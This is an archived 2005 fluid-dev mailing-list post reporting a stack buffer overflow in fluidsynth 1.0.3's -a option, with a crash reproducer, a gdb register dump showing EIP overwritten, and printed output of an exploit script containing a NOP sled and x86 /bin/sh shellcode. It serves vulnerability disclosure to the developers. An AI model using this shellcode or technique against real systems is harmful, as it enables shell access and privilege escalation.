[fluid-dev] Bug Report: -a overflow

fluid-dev

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[fluid-dev] Bug Report: -a overflow

From:	Axioplase
Subject:	[fluid-dev] Bug Report: -a overflow
Date:	Mon, 07 Feb 2005 18:07:31 +0100
User-agent:	Mozilla Thunderbird 0.8 (X11/20040926)

fluidsynth can be exploited through an overflow when passing an argumentto the "-a" option.

See attached bug report.

Though there isn't a big risk that fluidsynth is suid root, that's a buganyway...


Axioplase.

--
<PaXaL2> fait chier les souris sans fil
<PaXaL2> je l'ai paumée

$ uname -a                                                               17:55
FreeBSD XXX.YYY 5.3-RELEASE FreeBSD 5.3-RELEASE #0: Fri Nov  5 04:19:18 UTC 
2004     address@hidden:/usr/obj/usr/src/sys/GENERIC  i386
$ fluidsynth --version                                                   17:55
fluidsynth 1.0.3

$fluidsynth -a `perl -e 'print "A"x500'` 
segmentation fault (core dumped)  fluidsynth -a `perl -e 'print "A"x500'`

$gdb -core fluidsynth.core 
GNU gdb 6.1.1 [FreeBSD]                                                         
                                            Copyright 2004 Free Software 
Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-marcel-freebsd".
Core was generated by `fluidsynth'.
Program terminated with signal 11, Segmentation fault.
#0  0x41414141 in ?? ()
(gdb) info reg
eax            0x41414141       1094795585
ecx            0x0      0
edx            0x280c623e       671900222
ebx            0x280c56a4       671897252
esp            0xbfbfe6cc       0xbfbfe6cc
ebp            0x280c5020       0x280c5020
esi            0x1      1
edi            0x280c6020       671899680
eip            0x41414141       0x41414141
eflags         0x10292  66194
cs             0x1f     31
ss             0x2f     47
ds             0x2f     47
es             0x2f     47
fs             0x2f     47
gs             0x97     151



$ fluidsynth -a `./expl.pl 578 0`
using adress 0xbfbfeb50
using exploit 
\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x              
                              
90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x
                                            
90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x
                                            
90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x
                                            
90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x
                                            
90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x
                                            
90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x
                                            
90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x
                                            
90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x
                                            
90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x
                                            
90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x
                                            
90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x
                                            
90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x
                                            
90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x
                                            
90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xeb\x17\x5e\x31\xc0\x50\x88\x
                                            
46\x07\x89\x46\x08\x89\xf7\xb0\x08\x01\xc7\x57\x56\xb0\x3b\x50\xcd\x80\xe8\xe4\x
                                            
ff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x23\x90\x90\x90\x50\xeb\xbf\xbf\x50\xeb\x
                                            
bf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\x
                                            
bf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\x
                                            
bf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\x
                                            
bf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\x
                                            
bf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\x
                                            
bf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\x
                                            
bf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\x
                                            
bf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\x
                                            
bf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\x
                                            
bf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\x
                                            
bf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\x
                                            
bf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\x
                                            
bf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\x
                                            
bf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\x
                                            bf\xbf

$ echo exploit worked > r00ted

[Prev in Thread]

Current Thread

[Next in Thread]

[fluid-dev] Bug Report: -a overflow, Axioplase <=
- Re: [fluid-dev] Bug Report: -a overflow, Josh Green, 2005/02/09
  - Re: [fluid-dev] Bug Report: -a overflow, David Olofson, 2005/02/09
    - Re: [fluid-dev] Bug Report: -a overflow, Josh Green, 2005/02/09
  - Re: [fluid-dev] Bug Report: -an overflow, Ebrahim Mayat, 2005/02/09

Prev by Date: [fluid-dev] Elloelloello :)
Next by Date: Re: [fluid-dev] Sequencer Client
Previous by thread: [fluid-dev] Elloelloello :)
Next by thread: Re: [fluid-dev] Bug Report: -a overflow
Index(es):
- Date
- Thread